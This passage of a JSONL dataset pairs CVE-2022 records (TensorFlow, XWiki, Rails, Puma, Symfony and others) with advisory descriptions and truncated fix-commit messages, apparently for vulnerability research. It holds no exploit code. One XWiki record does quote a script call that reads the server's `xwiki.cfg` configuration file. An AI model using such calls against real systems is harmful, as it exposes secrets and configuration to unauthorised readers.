2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix abort caused by allocating a too large vector.\n\nWe need to", "cve_id": "CVE-2022-23580", "source": "cvefixes", "timestamp": ""} {"id": "2329ef4432eba15ea053", "text": "CVE: CVE-2022-23581\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `IsSimplifiableReshape` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Remove `C", "cve_id": "CVE-2022-23581", "source": "cvefixes", "timestamp": ""} {"id": "61d4ee98cca2d25b0c02", "text": "CVE: CVE-2022-23581\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `IsSimplifiableReshape` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate", "cve_id": "CVE-2022-23581", "source": "cvefixes", "timestamp": ""} {"id": "8fa84c8b8b34612aa7db", "text": "CVE: CVE-2022-23581\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The Grappler optimizer in TensorFlow can be used to cause a denial of service by altering a `SavedModel` such that `IsSimplifiableReshape` would trigger `CHECK` failures. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Make `IsS", "cve_id": "CVE-2022-23581", "source": "cvefixes", "timestamp": ""} {"id": "22ba2019b40bf43a9bb0", "text": "CVE: CVE-2022-23582\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that `TensorByteSize` would trigger `CHECK` failures. `TensorShape` constructor throws a `CHECK`-fail if shape is partial or has a number of elements that would overflow the size of an `int`. The `PartialTensorShape` constructor instead does not cause a `CHECK`-abort if the shape is partial, which is exactly what th", "cve_id": "CVE-2022-23582", "source": "cvefixes", "timestamp": ""} {"id": "c6987e82ae7a32165290", "text": "CVE: CVE-2022-23583\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that any binary op would trigger `CHECK` failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the `dtype` no longer matches the `dtype` expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to th", "cve_id": "CVE-2022-23583", "source": "cvefixes", "timestamp": ""} {"id": "47307c0c18eee629a197", "text": "CVE: CVE-2022-23584\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a use after free behavior when decoding PNG images. After `png::CommonFreeDecode(&decode)` gets called, the values of `decode.width` and `decode.height` are in an unspecified state. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supp", "cve_id": "CVE-2022-23584", "source": "cvefixes", "timestamp": ""} {"id": "a53b5e0391eb5854aea1", "text": "CVE: CVE-2022-23585\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. When decoding PNG images TensorFlow can produce a memory leak if the image is invalid. After calling `png::CommonInitDecode(..., &decode)`, the `decode` value contains allocated buffers which can only be freed by calling `png::CommonFreeDecode(&decode)`. However, several error case in the function implementation invoke the `OP_REQUIRES` macro which immediately terminates the execution of the f", "cve_id": "CVE-2022-23585", "source": "cvefixes", "timestamp": ""} {"id": "45f9f24276772be1553f", "text": "CVE: CVE-2022-23586\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that assertions in `function.cc` would be falsified and crash the Python interpreter. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate `CHEC", "cve_id": "CVE-2022-23586", "source": "cvefixes", "timestamp": ""} {"id": "d65841ced5d919dfa598", "text": "CVE: CVE-2022-23586\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that assertions in `function.cc` would be falsified and crash the Python interpreter. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Eliminate debug", "cve_id": "CVE-2022-23586", "source": "cvefixes", "timestamp": ""} {"id": "ce64468d8088f77c8235", "text": "CVE: CVE-2022-23587\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, Grappler component of TensorFlow is vulnerable to an integer overflow during cost estimation for crop and resize. Since the cropping parameters are user controlled, a malicious person can trigger undefined behavior. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are", "cve_id": "CVE-2022-23587", "source": "cvefixes", "timestamp": ""} {"id": "c25ac1fc2865b7bcbe4e", "text": "CVE: CVE-2022-23588\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A malicious user can cause a denial of service by altering a `SavedModel` such that Grappler optimizer would attempt to build a tensor using a reference `dtype`. This would result in a crash due to a `CHECK`-fail in the `Tensor` constructor as reference types are not allowed. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3", "cve_id": "CVE-2022-23588", "source": "cvefixes", "timestamp": ""} {"id": "ab0e89e8f75e32a566dc", "text": "CVE: CVE-2022-23589\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, Grappler component of TensorFlow can trigger a null pointer dereference. There are 2 places where this can occur, for the same malicious alteration of a `SavedModel` file (fixing the first one would trigger the same dereference in the second place). First, during constant folding, the `GraphDef` might not have the required nodes for the binary operation. If a node is m", "cve_id": "CVE-2022-23589", "source": "cvefixes", "timestamp": ""} {"id": "007ee110cbacec8e974e", "text": "CVE: CVE-2022-23590\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. A `GraphDef` from a TensorFlow `SavedModel` can be maliciously altered to cause a TensorFlow process to crash due to encountering a `StatusOr` value that is an error and forcibly extracting the value from it. We have patched the issue in multiple GitHub commits and these will be included in TensorFlow 2.8.0 and TensorFlow 2.7.1, as both are affected.'}]\n\nFix commit: Check for type inference er", "cve_id": "CVE-2022-23590", "source": "cvefixes", "timestamp": ""} {"id": "3b3be8698ef8c5ab3cec", "text": "CVE: CVE-2022-23591\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The `GraphDef` format in TensorFlow does not allow self recursive functions. The runtime assumes that this invariant is satisfied. However, a `GraphDef` containing a fragment such as the following can be consumed when loading a `SavedModel`. This would result in a stack overflow during execution as resolving each `NodeDef` means resolving the function itself and its nodes. The fix will be incl", "cve_id": "CVE-2022-23591", "source": "cvefixes", "timestamp": ""} {"id": "1e2cf9483ac0aebe6cf5", "text": "CVE: CVE-2022-23592\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. TensorFlow's type inference can cause a heap out of bounds read as the bounds checking is done in a `DCHECK` (which is a no-op during production). An attacker can control the `input_idx` variable such that `ix` would be larger than the number of values in `node_t.args`. The fix will be included in TensorFlow 2.8.0. This is the only affected version.\"}]\n\nFix commit: Handle invalid inputs instea", "cve_id": "CVE-2022-23592", "source": "cvefixes", "timestamp": ""} {"id": "6d4cf986fbc4eb93a571", "text": "CVE: CVE-2022-23593\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The `simplifyBroadcast` function in the MLIR-TFRT infrastructure in TensorFlow is vulnerable to a segfault (hence, denial of service), if called with scalar shapes. If all shapes are scalar, then `maxRank` is 0, so we build an empty `SmallVector`. The fix will be included in TensorFlow 2.8.0. This is the only affected version.'}]\n\nFix commit: Avoid Segfault for scalar shapes.\n\nCalling tensor::", "cve_id": "CVE-2022-23593", "source": "cvefixes", "timestamp": ""} {"id": "488d1a19fd02c7715905", "text": "CVE: CVE-2022-23595\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. When building an XLA compilation cache, if default settings are used, TensorFlow triggers a null pointer dereference. In the default scenario, all devices are allowed, so `flr->config_proto` is `nullptr`. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supporte", "cve_id": "CVE-2022-23595", "source": "cvefixes", "timestamp": ""} {"id": "2373c584178c891f85ad", "text": "CVE: CVE-2022-23596\n\n[{'lang': 'en', 'value': 'Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible.'}]\n\nFix commit: fix: invalid subheader type would ", "cve_id": "CVE-2022-23596", "source": "cvefixes", "timestamp": ""} {"id": "c29fda1f84202682a00a", "text": "CVE: CVE-2022-23597\n\n[{'lang': 'en', 'value': \"Element Desktop is a Matrix client for desktop platforms with Element Web at its core. Element Desktop before 1.9.7 is vulnerable to a remote program execution bug with user interaction. The exploit is non-trivial and requires clicking on a malicious link, followed by another button click. To the best of our knowledge, the vulnerability has never been exploited in the wild. If you are using Element Desktop < 1.9.7, we recommend upgrading at your ear", "cve_id": "CVE-2022-23597", "source": "cvefixes", "timestamp": ""} {"id": "037160c70ddc6a6ba810", "text": "CVE: CVE-2022-23598\n\n[{'lang': 'en', 'value': 'laminas-form is a package for validating and displaying simple and complex forms. When rendering validation error messages via the `formElementErrors()` view helper shipped with laminas-form, many messages will contain the submitted value. However, in laminas-form prior to version 3.1.1, the value was not being escaped for HTML contexts, which could potentially lead to a reflected cross-site scripting attack. Versions 3.1.1 and above contain a patch", "cve_id": "CVE-2022-23598", "source": "cvefixes", "timestamp": ""} {"id": "f689c0f008fbb91c3f9e", "text": "CVE: CVE-2022-23599\n\n[{'lang': 'en', 'value': \"Products.ATContentTypes are the core content types for Plone 2.1 - 4.3. Versions of Plone that are dependent on Products.ATContentTypes prior to version 3.0.6 are vulnerable to reflected cross site scripting and open redirect when an attacker can get a compromised version of the image_view_fullscreen page in a cache, for example in Varnish. The technique is known as cache poisoning. Any later visitor can get redirected when clicking on a link on thi", "cve_id": "CVE-2022-23599", "source": "cvefixes", "timestamp": ""} {"id": "e6919ad96998c5dac0ab", "text": "CVE: CVE-2022-23601\n\n[{'lang': 'en', 'value': 'Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The Symfony form component provides a CSRF protection mechanism by using a random token injected in the form and using the session to store and control the token submitted by the user. When using the FrameworkBundle, this protection can be enabled or disabled with the configuration. If the configuration is not specified, by default, the mechanism is ena", "cve_id": "CVE-2022-23601", "source": "cvefixes", "timestamp": ""} {"id": "acd04f45d9a02b0b3a3f", "text": "CVE: CVE-2022-23602\n\n[{'lang': 'en', 'value': 'Nimforum is a lightweight alternative to Discourse written in Nim. In versions prior to 2.2.0 any forum user can create a new thread/post with an include referencing a file local to the host operating system. Nimforum will render the file if able. This can also be done silently by using NimForum\\'s post \"preview\" endpoint. Even if NimForum is running as a non-critical user, the forum.json secrets can be stolen. Version 2.2.0 of NimForum includes pat", "cve_id": "CVE-2022-23602", "source": "cvefixes", "timestamp": ""} {"id": "f6eb684167873042f97d", "text": "CVE: CVE-2022-23603\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-3xpp-rhqx-cw96\n\nsec fix", "cve_id": "CVE-2022-23603", "source": "cvefixes", "timestamp": ""} {"id": "bb16cee13400ada4c4f1", "text": "CVE: CVE-2022-23603\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-3xpp-rhqx-cw96\n\nsec fix 2", "cve_id": "CVE-2022-23603", "source": "cvefixes", "timestamp": ""} {"id": "86530a87600ed11441c8", "text": "CVE: CVE-2022-23604\n\n[{'lang': 'en', 'value': 'x26-Cogs is a repository of cogs made by Twentysix for the Red Discord bot. Among these cogs is the Defender cog, a tool for Discord server moderation. A vulnerability in the Defender cog prior to version 1.10.0 allows users with admin privileges to issue commands as other users who share the same server. If a bot owner shares the same server as the attacker, it is possible for the attacker to issue bot-owner restricted commands. The issue has been ", "cve_id": "CVE-2022-23604", "source": "cvefixes", "timestamp": ""} {"id": "518055a7049140ef2cae", "text": "CVE: CVE-2022-23605\n\n[{'lang': 'en', 'value': 'Wire webapp is a web client for the wire messaging protocol. In versions prior to 2022-01-27-production.0 expired ephemeral messages were not reliably removed from local chat history of Wire Webapp. In versions before 2022-01-27-production.0 ephemeral messages and assets might still be accessible through the local search functionality. Any attempt to view one of these message in the chat view will then trigger the deletion. This issue only affects l", "cve_id": "CVE-2022-23605", "source": "cvefixes", "timestamp": ""} {"id": "710d89d8bd0e85239fd0", "text": "CVE: CVE-2022-23606\n\n[{'lang': 'en', 'value': 'Envoy is an open source edge and service proxy, designed for cloud-native applications. When a cluster is deleted via Cluster Discovery Service (CDS) all idle connections established to endpoints in that cluster are disconnected. A recursion was introduced in the procedure of disconnecting idle connections that can lead to stack exhaustion and abnormal process termination when a cluster has a large number of idle connections. This infinite recursion", "cve_id": "CVE-2022-23606", "source": "cvefixes", "timestamp": ""} {"id": "adc570b82b06232ddc9d", "text": "CVE: CVE-2022-23608\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions up to and including 2.11.1 when in a dialog set (or forking) scenario, a hash key shared by multiple UAC dialogs can potentially be prematurely freed when one of the dialogs is destroyed . The issue may cause a dialog set to be registered in the hash table multiple times ", "cve_id": "CVE-2022-23608", "source": "cvefixes", "timestamp": ""} {"id": "f17f0576b97ae84593eb", "text": "CVE: CVE-2022-23609\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a Discord Rich Presence for iTunes on Windows utility. In affected versions iTunesRPC-Remastered did not properly sanitize user input used to remove files leading to file deletion only limited by the process permissions. Users are advised to upgrade as soon as possible.'}]\n\nFix commit: quick security fix", "cve_id": "CVE-2022-23609", "source": "cvefixes", "timestamp": ""} {"id": "bb5ad11562e514518204", "text": "CVE: CVE-2022-23611\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a Discord Rich Presence for iTunes on Windows utility. In affected versions iTunesRPC-Remastered did not properly sanitize image file paths leading to OS level command injection. This issue has been patched in commit cdcd48b. Users are advised to upgrade.'}]\n\nFix commit: small fix", "cve_id": "CVE-2022-23611", "source": "cvefixes", "timestamp": ""} {"id": "b1bb57d7b551e1a3e62e", "text": "CVE: CVE-2022-23612\n\n[{'lang': 'en', 'value': \"OpenMRS is a patient-based medical record system focusing on giving providers a free customizable electronic medical record system. Affected versions are subject to arbitrary file exfiltration due to failure to sanitize request when satisfying GET requests for `/images` & `/initfilter/scripts`. This can allow an attacker to access any file on a system running OpenMRS that is accessible to the user id OpenMRS is running under. Affected implementation", "cve_id": "CVE-2022-23612", "source": "cvefixes", "timestamp": ""} {"id": "505a2457a98c2b094eb7", "text": "CVE: CVE-2022-23613\n\n[{'lang': 'en', 'value': 'xrdp is an open source remote desktop protocol (RDP) server. In affected versions an integer underflow leading to a heap overflow in the sesman server allows any unauthenticated attacker which is able to locally access a sesman server to execute code as root. This vulnerability has been patched in version 0.9.18.1 and above. Users are advised to upgrade. There are no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-8h98-h426-xf32\n\nAdd", "cve_id": "CVE-2022-23613", "source": "cvefixes", "timestamp": ""} {"id": "4cf23793ccf6fd3a20a9", "text": "CVE: CVE-2022-23614\n\n[{'lang': 'en', 'value': 'Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrad", "cve_id": "CVE-2022-23614", "source": "cvefixes", "timestamp": ""} {"id": "dd8d51112c9cb21ec3ce", "text": "CVE: CVE-2022-23615\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with SCRIPT right can save a document with the right of the current user which allow accessing API requiring programming right if the current user has programming right. This has been patched in XWiki 13.0. Users are advised to update to resolve this issue. The only known workaround is to limit SCRIPT access.'}]\n\nFix", "cve_id": "CVE-2022-23615", "source": "cvefixes", "timestamp": ""} {"id": "e90a30948cdd3261792e", "text": "CVE: CVE-2022-23617\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit right can copy the content of a page it does not have access to by using it as template of a new page. This issue has been patched in XWiki 13.2CR1 and 12.10.6. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-18430: Wrong handling of template documents\n* imp", "cve_id": "CVE-2022-23617", "source": "cvefixes", "timestamp": ""} {"id": "bb1bcd2198bc2ef3917d", "text": "CVE: CVE-2022-23617\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with edit right can copy the content of a page it does not have access to by using it as template of a new page. This issue has been patched in XWiki 13.2CR1 and 12.10.6. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-18430: Page content is revealed to users that don", "cve_id": "CVE-2022-23617", "source": "cvefixes", "timestamp": ""} {"id": "27a36f6992aa0a042e87", "text": "CVE: CVE-2022-23618\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions there is no protection against URL redirection to untrusted sites, in particular some well known parameters (xredirect) can be used to perform url redirections. This problem has been patched in XWiki 12.10.7 and XWiki 13.3RC1. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-10", "cve_id": "CVE-2022-23618", "source": "cvefixes", "timestamp": ""} {"id": "aa02ba49a8196b360d06", "text": "CVE: CVE-2022-23619\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions it\\'s possible to guess if a user has an account on the wiki by using the \"Forgot your password\" form, even if the wiki is closed to guest users. This problem has been patched on XWiki 12.10.9, 13.4.1 and 13.6RC1. Users are advised yo update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-18787: Authenti", "cve_id": "CVE-2022-23619", "source": "cvefixes", "timestamp": ""} {"id": "56fa2753305881ae60c7", "text": "CVE: CVE-2022-23620\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions AbstractSxExportURLFactoryActionHandler#processSx does not escape anything from SSX document references when serializing it on filesystem, it is possible to for the HTML export process to contain reference elements containing filesystem syntax like \"../\", \"./\". or \"/\" in general. The referenced elements are not properly escap", "cve_id": "CVE-2022-23620", "source": "cvefixes", "timestamp": ""} {"id": "e4344ea5dbcd404452ea", "text": "CVE: CVE-2022-23621\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with SCRIPT right can read any file located in the XWiki WAR (for example xwiki.cfg and xwiki.properties) through XWiki#invokeServletAndReturnAsString as `$xwiki.invokeServletAndReturnAsString(\"/WEB-INF/xwiki.cfg\")`. This issue has been patched in XWiki versions 12.10.9, 13.4.3 and 13.7-rc-1. Users are advised to upd", "cve_id": "CVE-2022-23621", "source": "cvefixes", "timestamp": ""} {"id": "075391883f81411ca2e5", "text": "CVE: CVE-2022-23622\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions there is a cross site scripting (XSS) vector in the `registerinline.vm` template related to the `xredirect` hidden field. This template is only used in the following conditions: 1. The wiki must be open to registration for anyone. 2. The wiki must be closed to view for Guest users or more specifically the XWiki.Registration p", "cve_id": "CVE-2022-23622", "source": "cvefixes", "timestamp": ""} {"id": "ae7f62ada474adeb74c5", "text": "CVE: CVE-2022-23623\n\n[{'lang': 'en', 'value': 'Frourio is a full stack framework, for TypeScript. Frourio users who uses frourio version prior to v0.26.0 and integration with class-validator through `validators/` folder are subject to a input validation vulnerability. Validators do not work properly for request bodies and queries in specific situations and some input is not validated at all. Users are advised to update frourio to v0.26.0 or later and to install `class-transformer` and `reflect-m", "cve_id": "CVE-2022-23623", "source": "cvefixes", "timestamp": ""} {"id": "fe77adca32441c606957", "text": "CVE: CVE-2022-23624\n\n[{'lang': 'en', 'value': 'Frourio-express is a minimal full stack framework, for TypeScript. Frourio-express users who uses frourio-express version prior to v0.26.0 and integration with class-validator through `validators/` folder are subject to a input validation vulnerability. Validators do not work properly for request bodies and queries in specific situations and some input is not validated at all. Users are advised to update frourio to v0.26.0 or later and to install `c", "cve_id": "CVE-2022-23624", "source": "cvefixes", "timestamp": ""} {"id": "c7f184b4387123949919", "text": "CVE: CVE-2022-23625\n\n[{'lang': 'en', 'value': \"Wire-ios is a messaging application using the wire protocol on apple's ios platform. In versions prior to 3.95 malformed resource identifiers may render the iOS Wire Client completely unusable by causing it to repeatedly crash on launch. These malformed resource identifiers can be generated and sent between Wire users. The root cause lies in [wireapp/wire-ios-transport](https://github.com/wireapp/wire-ios-transport), where code responsible for remov", "cve_id": "CVE-2022-23625", "source": "cvefixes", "timestamp": ""} {"id": "382b7c508efcf3b9c3fb", "text": "CVE: CVE-2022-23626\n\n[{'lang': 'en', 'value': 'm1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.'}]\n\nFix commit: check image create errors.", "cve_id": "CVE-2022-23626", "source": "cvefixes", "timestamp": ""} {"id": "a4c5766ccf1db91f81c4", "text": "CVE: CVE-2022-23627\n\n[{'lang': 'en', 'value': \"ArchiSteamFarm (ASF) is a C# application with primary purpose of idling Steam cards from multiple accounts simultaneously. Due to a bug in ASF code, introduced in version V5.2.2.2, the program didn't adequately verify effective access of the user sending proxy (i.e. `[Bots]`) commands. In particular, a proxy-like command sent to bot `A` targeting bot `B` has incorrectly verified user's access against bot `A` - instead of bot `B`, to which the comman", "cve_id": "CVE-2022-23627", "source": "cvefixes", "timestamp": ""} {"id": "ec97afdde888adf0f415", "text": "CVE: CVE-2022-23628\n\n[{'lang': 'en', 'value': \"OPA is an open source, general-purpose policy engine. Under certain conditions, pretty-printing an abstract syntax tree (AST) that contains synthetic nodes could change the logic of some statements by reordering array literals. Example of policies impacted are those that parse and compare web paths. **All of these** three conditions have to be met to create an adverse effect: 1. An AST of Rego had to be **created programmatically** such that it ends", "cve_id": "CVE-2022-23628", "source": "cvefixes", "timestamp": ""} {"id": "c60f3b2a29f49ece9fec", "text": "CVE: CVE-2022-23630\n\n[{'lang': 'en', 'value': 'Gradle is a build tool with a focus on build automation and support for multi-language development. In some cases, Gradle may skip that verification and accept a dependency that would otherwise fail the build as an untrusted external artifact. This occurs when dependency verification is disabled on one or more configurations and those configurations have common dependencies with other configurations that have dependency verification enabled. If the ", "cve_id": "CVE-2022-23630", "source": "cvefixes", "timestamp": ""} {"id": "89b301e9eb7eb10d4bea", "text": "CVE: CVE-2022-23633\n\n[{'lang': 'en', 'value': 'Action Pack is a framework for handling and responding to web requests. Under certain circumstances response bodies will not be closed. In the event a response is *not* notified of a `close`, `ActionDispatch::Executor` will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests.This has been fixed in Rails 7.0.2.1, 6.1.4.5, 6.0.4.5, and 5.2.6.1. Upgrading is highly recommended, but to wor", "cve_id": "CVE-2022-23633", "source": "cvefixes", "timestamp": ""} {"id": "508379ebc061763b60d4", "text": "CVE: CVE-2022-23634\n\n[{'lang': 'en', 'value': \"Puma is a Ruby/Rack web server built for parallelism. Prior to `puma` version `5.6.2`, `puma` may not always call `close` on the response body. Rails, prior to version `7.0.2.2`, depended on the response body being closed in order for its `CurrentAttributes` implementation to work correctly. The combination of these two behaviors (Puma not closing the body + Rails' Executor implementation) causes information leakage. This problem is fixed in Puma ve", "cve_id": "CVE-2022-23634", "source": "cvefixes", "timestamp": ""} {"id": "de57d6b8160f62538ed2", "text": "CVE: CVE-2022-23637\n\n[{'lang': 'en', 'value': 'K-Box is a web-based application to manage documents, images, videos and geodata. Prior to version 0.33.1, a stored Cross-Site-Scripting (XSS) vulnerability is present in the markdown editor used by the document abstract and markdown file preview. A specifically crafted anchor link can, if clicked, execute untrusted javascript actions, like retrieving user cookies. Version 0.33.1 includes a patch that allows discarding unsafe links.'}]\n\nFix commit: ", "cve_id": "CVE-2022-23637", "source": "cvefixes", "timestamp": ""} {"id": "236062b799a2b75f843f", "text": "CVE: CVE-2022-23638\n\n[{'lang': 'en', 'value': 'svg-sanitizer is a SVG/XML sanitizer written in PHP. A cross-site scripting vulnerability impacts all users of the `svg-sanitizer` library prior to version 0.15.0. This issue is fixed in version 0.15.0. There is currently no workaround available.'}]\n\nFix commit: Merge pull request from GHSA-fqx8-v33p-4qcc\n\nAdvisory fix 1", "cve_id": "CVE-2022-23638", "source": "cvefixes", "timestamp": ""} {"id": "26213821485bb643d39b", "text": "CVE: CVE-2022-23640\n\n[{'lang': 'en', 'value': 'Excel-Streaming-Reader is an easy-to-use implementation of a streaming Excel reader using Apache POI. Prior to xlsx-streamer 2.1.0, the XML parser that was used did apply all the necessary settings to prevent XML Entity Expansion issues. Upgrade to version 2.1.0 to receive a patch. There is no known workaround.'}]\n\nFix commit: Updating readme for security release", "cve_id": "CVE-2022-23640", "source": "cvefixes", "timestamp": ""} {"id": "37c14571ede2efc355eb", "text": "CVE: CVE-2022-23641\n\n[{'lang': 'en', 'value': 'Discourse is an open source discussion platform. In versions prior to 2.8.1 in the `stable` branch, 2.9.0.beta2 in the `beta` branch, and 2.9.0.beta2 in the `tests-passed` branch, users can trigger a Denial of Service attack by posting a streaming URL. Parsing Oneboxes in the background job trigger an infinite loop, which cause memory leaks. This issue is patched in version 2.8.1 of the `stable` branch, 2.9.0.beta2 of the `beta` branch, and 2.9.0.be", "cve_id": "CVE-2022-23641", "source": "cvefixes", "timestamp": ""} {"id": "6c5b502cf7db693b5722", "text": "CVE: CVE-2022-23645\n\n[{'lang': 'en', 'value': \"swtpm is a libtpms-based TPM emulator with socket, character device, and Linux CUSE interface. Versions prior to 0.5.3, 0.6.2, and 0.7.1 are vulnerable to out-of-bounds read. A specially crafted header of swtpm's state, where the blobheader's hdrsize indicator has an invalid value, may cause an out-of-bounds access when the byte array representing the state of the TPM is accessed. This will likely crash swtpm or prevent it from starting since the st", "cve_id": "CVE-2022-23645", "source": "cvefixes", "timestamp": ""} {"id": "c1a2615fc9aba88f4fbe", "text": "CVE: CVE-2022-23647\n\n[{'lang': 'en', 'value': \"Prism is a syntax highlighting library. Starting with version 1.14.0 and prior to version 1.27.0, Prism's command line plugin can be used by attackers to achieve a cross-site scripting attack. The command line plugin did not properly escape its output, leading to the input text being inserted into the DOM as HTML code. Server-side usage of Prism is not impacted. Websites that do not use the Command Line plugin are also not impacted. This bug has bee", "cve_id": "CVE-2022-23647", "source": "cvefixes", "timestamp": ""} {"id": "801a3f4f14c9960ddf32", "text": "CVE: CVE-2022-23649\n\n[{'lang': 'en', 'value': 'Cosign provides container signing, verification, and storage in an OCI registry for the sigstore project. Prior to version 1.5.2, Cosign can be manipulated to claim that an entry for a signature exists in the Rekor transparency log even if it doesn\\'t. This requires the attacker to have pull and push permissions for the signature in OCI. This can happen with both standard signing with a keypair and \"keyless signing\" with Fulcio. If an attacker has a", "cve_id": "CVE-2022-23649", "source": "cvefixes", "timestamp": ""} {"id": "49f9e54aa964e659f1d0", "text": "CVE: CVE-2022-2365\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository zadam/trilium prior to 0.53.3.'}]\n\nFix commit: fix note title escaping in export dialog", "cve_id": "CVE-2022-2365", "source": "cvefixes", "timestamp": ""} {"id": "b03abaf738992b58ee80", "text": "CVE: CVE-2022-23650\n\n[{'lang': 'en', 'value': 'Netmaker is a platform for creating and managing virtual overlay networks using WireGuard. Prior to versions 0.8.5, 0.9.4, and 010.0, there is a hard-coded cryptographic key in the code base which can be exploited to run admin commands on a remote server if the exploiter know the address and username of the admin. This effects the server (netmaker) component, and not clients. This has been patched in Netmaker v0.8.5, v0.9.4, and v0.10.0. There are c", "cve_id": "CVE-2022-23650", "source": "cvefixes", "timestamp": ""} {"id": "430d2a8cb8c8f18b928a", "text": "CVE: CVE-2022-23651\n\n[{'lang': 'en', 'value': 